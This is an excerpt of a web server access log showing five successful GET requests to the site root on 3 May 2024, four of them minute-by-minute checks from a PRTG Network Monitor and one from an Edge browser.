146.19.24.28 - - [03/May/2024:23:23:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/May/2024:23:24:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:25:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:26:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/May/2024:23:27:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
